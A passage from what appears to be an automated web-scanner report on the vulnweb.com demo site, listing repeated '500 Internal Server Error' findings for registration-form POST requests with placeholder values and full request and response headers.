<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
